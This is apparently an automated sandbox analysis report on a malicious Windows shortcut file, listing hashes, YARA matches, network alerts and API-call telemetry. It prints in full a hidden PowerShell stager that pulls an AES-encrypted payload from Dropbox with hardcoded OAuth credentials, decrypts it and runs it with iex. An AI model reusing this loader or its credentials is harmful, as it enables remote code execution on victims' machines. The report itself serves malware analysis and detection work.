Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 1, 2024, 10:10 a.m.	Aug. 1, 2024, 10:12 a.m.

Size	1.0MB
Type	MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`886535bbe925890a01f49f49f49fee40`
SHA256	`d1f1019fb0f0810a8633bd0ef5a0d7b68ec94c5f09251eccd3e5076c97984377`
CRC32	`12E2C8EE`
ssdeep	`768:Iz6Nj4u6PYcDrYMpP6HUWsiTQn4zFTOWzrfaDSrwB2pOnVdWJMF/8C:Iz6NEuIRDvKdPwWH5wBaoVdWJMdJ`
Yara	HWP_file_format - HWP Document File Microsoft_Office_File_Zero - Microsoft Office File lnk_file_format - Microsoft Windows Shortcut File Format Win32_HWP_PostScript_Zero - Detect a HWP with embedded Post Script code Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "iIotnLfzKPTb" C:\Users\test22\AppData\Local\Temp\886535bbe925890a01f49f49f49fee40.lnk
3020
- cmd.exe "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $len1 = 1055494;$len2 = 1097478;$len3 = 1097478;$len4 = 0x0010BF1A; $clientID = \"n4cbu7oqmhjc8g4\";$clientSecret = \"tljfr15auwthgfs\";$refreshToken = \"DHn1AW_R0rYAAAAAAAAAAYZ_QnHNwRsFir9l7mXFbtO1Ktifhc4MK9XaB4ChtiDL\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step4/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
  2188
  - powershell.exe powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $len1 = 1055494;$len2 = 1097478;$len3 = 1097478;$len4 = 0x0010BF1A; $clientID = \"n4cbu7oqmhjc8g4\";$clientSecret = \"tljfr15auwthgfs\";$refreshToken = \"DHn1AW_R0rYAAAAAAAAAAYZ_QnHNwRsFir9l7mXFbtO1Ktifhc4MK9XaB4ChtiDL\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step4/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
    292

Name	Response	Post-Analysis Lookup
content.dropboxapi.com	CNAME edge-block-api-env.dropbox-dns.com A 162.125.80.14	162.125.80.14

IP Address	Status	Action
162.125.80.14	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49166 -> 162.125.80.14:443	2030702	ET POLICY [401TRG] DropBox Access via API (SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.102:49166 -> 162.125.80.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49165 -> 162.125.80.14:443	2030702	ET POLICY [401TRG] DropBox Access via API (SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.102:49166 -> 162.125.80.14:443	2030702	ET POLICY [401TRG] DropBox Access via API (SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.102:49165 -> 162.125.80.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49165 -> 162.125.80.14:443	2030702	ET POLICY [401TRG] DropBox Access via API (SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.102:49165 -> 162.125.80.14:443	2030702	ET POLICY [401TRG] DropBox Access via API (SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.102:49166 -> 162.125.80.14:443	2030702	ET POLICY [401TRG] DropBox Access via API (SNI)	Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 1, 2024, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2024, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2024, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2024, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 1, 2024, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2024, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2024, 10:10 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 1, 2024, 10:10 a.m.			0	0

Command line console output was observed (50 out of 177 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: The term 'Invoke-RestMethod' is not recognized as the name of a cmdlet, functio console_handle: 0x00000023	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: At line:1 char:1256 console_handle: 0x00000047	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: + $tmp = 'C:\Users\test22\AppData\Local\Temp';Function AESDecrypt { param ( [By console_handle: 0x00000053	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: te[]]$bytes,[String]$pass="pa55w0rd") $InputStream = New-Object System.IO.Memor console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: yStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New- console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $ console_handle: 0x00000077	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryp console_handle: 0x00000083	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: tography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV console_handle: 0x0000008f	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec console_handle: 0x0000009b	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Secu console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: rity.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptograph console_handle: 0x000000b3	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: y.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Di console_handle: 0x000000bf	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: spose();return $OutputStream.ToArray();} $len1 = 1055494;$len2 = 1097478; console_handle: 0x000000cb	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: $len3 = 1097478;$len4 = 0x0010BF1A; $clientID = "n4cbu7oqmhjc8g4";$clientSec console_handle: 0x000000d7	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: ret = "tljfr15auwthgfs";$refreshToken = "DHn1AW_R0rYAAAAAAAAAAYZ_QnHNwRsFir9l7m console_handle: 0x000000e3	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: XFbtO1Ktifhc4MK9XaB4ChtiDL";$body = @{grant_type="refresh_token";refresh_token= console_handle: 0x000000ef	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: $refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = console_handle: 0x000000fb	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: "https://api.dropboxapi.com/oauth2/token";$response = Invoke-RestMethod <<<< console_handle: 0x00000107	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$acce console_handle: 0x00000113	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: ssToken = $response.access_token;}$downloadUrl = "https://content.dropboxapi.co console_handle: 0x0000011f	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: m/2/files/download";$remoteFilePath = "/step4/ps.bin";$request = [System.Net.Ht console_handle: 0x0000012b	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: tpWebRequest]::Create($downloadUrl);$request.Method = "POST";$request.Headers.A console_handle: 0x00000137	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: dd("Authorization", "Bearer $accessToken");$request.Headers.Add("Dropbox-API-Ar console_handle: 0x00000143	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: g", '{"path": "' + $remoteFilePath + '"}');$response = $request.GetResponse();$ console_handle: 0x0000014f	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: receiveStream = $response.GetResponseStream();$pass = "pa55w0rd";if ($receiveSt console_handle: 0x0000015b	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: ream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStre console_handle: 0x00000167	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: am);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte console_handle: 0x00000173	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: [] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length); console_handle: 0x0000017f	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: $memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memo console_handle: 0x0000018b	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: ryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newSt console_handle: 0x00000197	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: ring = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memor console_handle: 0x000001a3	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: yStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close( console_handle: 0x000001af	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-RestMethod:String) [], C console_handle: 0x000001c7	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: ommandNotFoundException console_handle: 0x000001d3	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000001df	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: Exception calling "GetResponse" with "0" argument(s): "The underlying connectio console_handle: 0x000001ff	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: n was closed: An unexpected error occurred on a send." console_handle: 0x0000020b	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: At line:1 char:1727 console_handle: 0x00000217	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: + $tmp = 'C:\Users\test22\AppData\Local\Temp';Function AESDecrypt { param ( [By console_handle: 0x00000223	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: te[]]$bytes,[String]$pass="pa55w0rd") $InputStream = New-Object System.IO.Memor console_handle: 0x0000022f	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: yStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New- console_handle: 0x0000023b	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $ console_handle: 0x00000247	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryp console_handle: 0x00000253	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: tography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV console_handle: 0x0000025f	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec console_handle: 0x0000026b	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Secu console_handle: 0x00000277	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: rity.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptograph console_handle: 0x00000283	1	1
WriteConsoleW Aug. 1, 2024, 10:10 a.m.	buffer: y.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Di console_handle: 0x0000028f	1	1

Uses Windows APIs to generate a cryptographic key (48 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bffa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf8e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf8e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf8e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf8e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf8e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf8e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf3e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf3e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf3e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfaa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfda8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfda8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfda8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfda8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfda8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfda8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfda8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfda8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfda8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfda8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfda8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfda8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfda8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bfda8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf6e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004bf6e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 1, 2024, 10:10 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 156 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73921000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73922000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
